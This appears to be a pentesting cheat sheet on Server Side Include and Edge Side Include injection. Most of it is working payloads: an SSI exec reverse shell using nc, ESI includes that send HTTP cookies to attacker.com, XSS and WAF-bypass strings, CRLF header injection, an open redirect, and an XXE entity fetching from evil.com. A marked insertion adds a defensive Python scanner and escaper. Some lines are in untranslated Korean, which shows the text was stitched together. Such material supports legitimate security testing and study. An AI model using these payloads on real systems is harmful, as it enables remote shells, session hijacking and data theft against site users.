Server Side Inclusion/Edge Side Inclusion Injection


Server Side Inclusion Basic Information

(Introduction taken from Apache docs)

SSI (Server Side Includes) are directives that are placed in HTML pages and evaluated on the server while the pages are being served. They let you add dynamically generated content to an existing HTML page without having to serve the entire page via a CGI program or another dynamic technology.
For example, you might place a directive such as the following into an existing HTML page:

<!--#echo var="DATE_LOCAL" -->

And when the page is served, this fragment is evaluated and replaced with its value:

Tuesday, 15-Jan-2013 19:28:54 EST

The decision of when to use SSI and when to have the page generated entirely by a program is usually a matter of how much of the page is static and how much must be recalculated every time the page is served. SSI is a great way to add small pieces of information, such as the current time shown above. But if most of the page is generated at the time it is served, you need to look for some other solution.

You can infer the presence of SSI if the web application uses files with the .shtml, .shtm or .stm extensions, but that is not the only case.

μ „ν˜•μ μΈ SSI ν‘œν˜„μ‹μ€ λ‹€μŒ ν˜•μ‹μ„ κ°€μ§‘λ‹ˆλ‹€:

<!--#directive param="value" -->

Check

// Document name
<!--#echo var="DOCUMENT_NAME" -->
// Date
<!--#echo var="DATE_LOCAL" -->

// File inclusion
<!--#include virtual="/index.html" -->
// Including files (same directory)
<!--#include file="file_to_include.html" -->
// CGI Program results
<!--#include virtual="/cgi-bin/counter.pl" -->
// Including virtual files (same directory)
<!--#include virtual="file_to_include.html" -->
// Modification date of a file
<!--#flastmod file="index.html" -->

// Command exec
<!--#exec cmd="dir" -->
// Command exec
<!--#exec cmd="ls" -->
// Reverse shell
<!--#exec cmd="mkfifo /tmp/foo;nc <PENTESTER IP> <PORT> 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->

// Print all variables
<!--#printenv -->
// Setting variables
<!--#set var="name" value="Rich" -->

Edge Side Inclusion

Caching is a problem for dynamic applications, because part of the content may differ the next time it is retrieved. This is what ESI is used for: ESI tags mark the dynamic content that must be generated before the cached version is sent.
If an attacker can inject an ESI tag inside the cached content, they can inject arbitrary content into the document before it is sent to the users.

ESI Detection

μ„œλ²„μ˜ μ‘λ‹΅μ—μ„œ λ‹€μŒ ν—€λ”λŠ” μ„œλ²„κ°€ ESIλ₯Ό μ‚¬μš©ν•˜κ³  μžˆμŒμ„ μ˜λ―Έν•©λ‹ˆλ‹€:

Surrogate-Control: content="ESI/1.0"

If you cannot find this header, the server might still be using ESI.
A blind exploitation approach can also be used, since a request must arrive at the attacker's server:

// Basic detection
hell<!--esi-->o
// If previous is reflected as "hello", it's vulnerable

// Blind detection
<esi:include src=http://attacker.com>

// XSS Exploitation Example
<esi:include src=http://attacker.com/XSSPAYLOAD.html>

// Cookie Stealer (bypass httpOnly flag)
<esi:include src=http://attacker.com/?cookie_stealer.php?=$(HTTP_COOKIE)>

// Introduce private local files (Not LFI per se)
<esi:include src="supersecret.txt">

// Valid for Akamai, sends debug information in the response
<esi:debug/>

ESI Vulnerabilities

GoSecure created a table to understand the possible attacks that can be tried against different ESI-capable software, depending on the functionality supported:

  • Includes: Supports the <esi:include> directive.
  • Vars: Supports the <esi:vars> directive. Useful for bypassing XSS filters.
  • Cookie: Document cookies are accessible to the ESI engine.
  • Upstream Headers Required: The surrogate application will not process ESI statements unless the upstream application provides the headers.
  • Host Allowlist: In this case, ESI includes are only possible from allowed server hosts, so SSRF, for example, is only possible against those hosts.

| Software                      | Includes | Vars | Cookies | Upstream Headers Required | Host Whitelist |
|-------------------------------|----------|------|---------|---------------------------|----------------|
| Squid3                        | Yes      | Yes  | Yes     | Yes                       | No             |
| Varnish Cache                 | Yes      | No   | No      | Yes                       | Yes            |
| Fastly                        | Yes      | No   | No      | No                        | Yes            |
| Akamai ESI Test Server (ETS)  | Yes      | Yes  | Yes     | No                        | No             |
| NodeJS esi                    | Yes      | Yes  | Yes     | No                        | No             |
| NodeJS nodesi                 | Yes      | No   | No      | No                        | Optional       |

XSS

λ‹€μŒ ESI μ§€μ‹œμ–΄λŠ” μ„œλ²„μ˜ 응닡 λ‚΄μ—μ„œ μž„μ˜μ˜ νŒŒμΌμ„ λ‘œλ“œν•©λ‹ˆλ‹€.

<esi:include src=http://attacker.com/xss.html>

ν΄λΌμ΄μ–ΈνŠΈ XSS 보호 우회

x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>

Use <!--esi--> to bypass WAFs:
<scr<!--esi-->ipt>aler<!--esi-->t(1)</sc<!--esi-->ript>
<img+src=x+on<!--esi-->error=ale<!--esi-->rt(1)>
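As an added example that is not part of the original page: a small Python scanner for the syntaxes listed above (the `<!--#directive -->` SSI form, `<esi:...>` tags, `<!--esi ... -->` comments and the empty `<!--esi-->` keyword-splitting trick), plus the escaping an origin should apply to user text before it is written into a cacheable page. Function names and finding labels are my own.

```python
import re
from html import escape

# Directive grammars covered on this page:
#   Apache SSI:   <!--#directive param="value" -->
#   ESI tags:     <esi:include ...>, <esi:vars>, <esi:assign>, <esi:debug/>
#   ESI comments: <!--esi ... -->, including the empty <!--esi--> used to
#                 split keywords such as <scr<!--esi-->ipt>
SSI_DIRECTIVE = re.compile(r"<!--\s*#\s*(\w+).*?-->", re.DOTALL)
ESI_TAG = re.compile(r"</?\s*esi:(\w+)[^>]*>", re.IGNORECASE)
ESI_COMMENT = re.compile(r"<!--\s*esi(.*?)-->", re.DOTALL | re.IGNORECASE)
ESI_VARIABLE = re.compile(r"\$\(\s*\w+")            # $(HTTP_COOKIE), $(var1)
SCRIPT_MARKER = re.compile(r"<\s*script\b|\bon\w+\s*=", re.IGNORECASE)


def find_inclusion_directives(text: str) -> list[str]:
    """Label every SSI/ESI construct in untrusted text, grouped by kind."""
    findings = []
    for m in SSI_DIRECTIVE.finditer(text):
        findings.append("ssi:" + m.group(1).lower())
    for m in ESI_TAG.finditer(text):
        findings.append("esi:" + m.group(1).lower())
        if ESI_VARIABLE.search(m.group(0)):
            findings.append("esi:variable")
    for m in ESI_COMMENT.finditer(text):
        if m.group(1).strip():
            findings.append("esi:comment")
            if ESI_VARIABLE.search(m.group(1)):
                findings.append("esi:variable")
        else:
            findings.append("esi:empty-comment")
    # Empty ESI comments vanish when the surrogate processes the page, so a
    # keyword split by them must be checked in its reassembled form.
    reassembled = ESI_COMMENT.sub("", text)
    if SCRIPT_MARKER.search(reassembled) and not SCRIPT_MARKER.search(text):
        findings.append("script-split-by-esi-comment")
    return findings


def neutralize(text: str) -> str:
    """Escape user text before it is written into a cacheable page.

    Every grammar above needs a literal '<' to open a directive; html.escape
    turns '<', '>', '&' and quotes into entities, so neither the origin's SSI
    handler nor the surrogate's ESI processor can parse a directive out of it.
    """
    return escape(text, quote=True)
```

Run the scanner over response bodies or user-submitted fields at the origin; the `script-split-by-esi-comment` finding is the one a plain script-tag filter misses.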

Steal Cookies

  • Remote cookie theft
<esi:include src=http://attacker.com/$(HTTP_COOKIE)>
<esi:include src="http://attacker.com/?cookie=$(HTTP_COOKIE{'JSESSIONID'})" />
  • Steal HTTP_ONLY cookies with XSS by reflecting them in the response:
# This will reflect the cookies in the response
<!--esi $(HTTP_COOKIE) -->
# Reflect XSS (you can put '"><svg/onload=prompt(1)>' URL encoded, then URL encode everything to send it in the HTTP request)
<!--esi/$url_decode('"><svg/onload=prompt(1)>')/-->

# It's possible to put more complex JS code to steal cookies or perform actions

Private Local File

Do not confuse this with "Local File Inclusion":

<esi:include src="secret.txt">

CRLF

<esi:include src="http://anything.com%0d%0aX-Forwarded-For:%20127.0.0.1%0d%0aJunkHeader:%20JunkValue/"/>

Open Redirect

λ‹€μŒμ€ 응닡에 Location 헀더λ₯Ό μΆ”κ°€ν•©λ‹ˆλ‹€.

<!--esi $add_header('Location','http://attacker.com') -->

Add Header

  • Add a header to the forced request
<esi:include src="http://example.com/asdasd">
<esi:request_header name="User-Agent" value="12345"/>
</esi:include>
  • Add a header to the response (useful to bypass "Content-Type: text/json" in a response with XSS)
<!--esi/$add_header('Content-Type','text/html')/-->

<!--esi/$(HTTP_COOKIE)/$add_header('Content-Type','text/html')/$url_decode($url_decode('"><svg/onload=prompt(1)>'))/-->

# Check the number of url_decode to know how many times you can URL encode the value

CRLF in Add header (CVE-2019-2438)

<esi:include src="http://example.com/asdasd">
<esi:request_header name="User-Agent" value="12345
Host: anotherhost.com"/>
</esi:include>

Akamai debug

This sends debug information included in the response:

<esi:debug/>

ESI + XSLT = XXE

It is possible to use eXtensible Stylesheet Language Transformations (XSLT) syntax in ESI simply by specifying the dca value as **xslt**. This could allow XSLT to be abused to create and exploit an XML External Entity (XXE) vulnerability:

<esi:include src="http://host/poc.xml" dca="xslt" stylesheet="http://host/poc.xsl" />

XSLT file:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE xxe [<!ENTITY xxe SYSTEM "http://evil.com/file" >]>
<foo>&xxe;</foo>

Check the XSLT page:

XSLT Server Side Injection (Extensible Stylesheet Language Transformations)

References

Brute-Force Detection List

https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssi_esi.txt
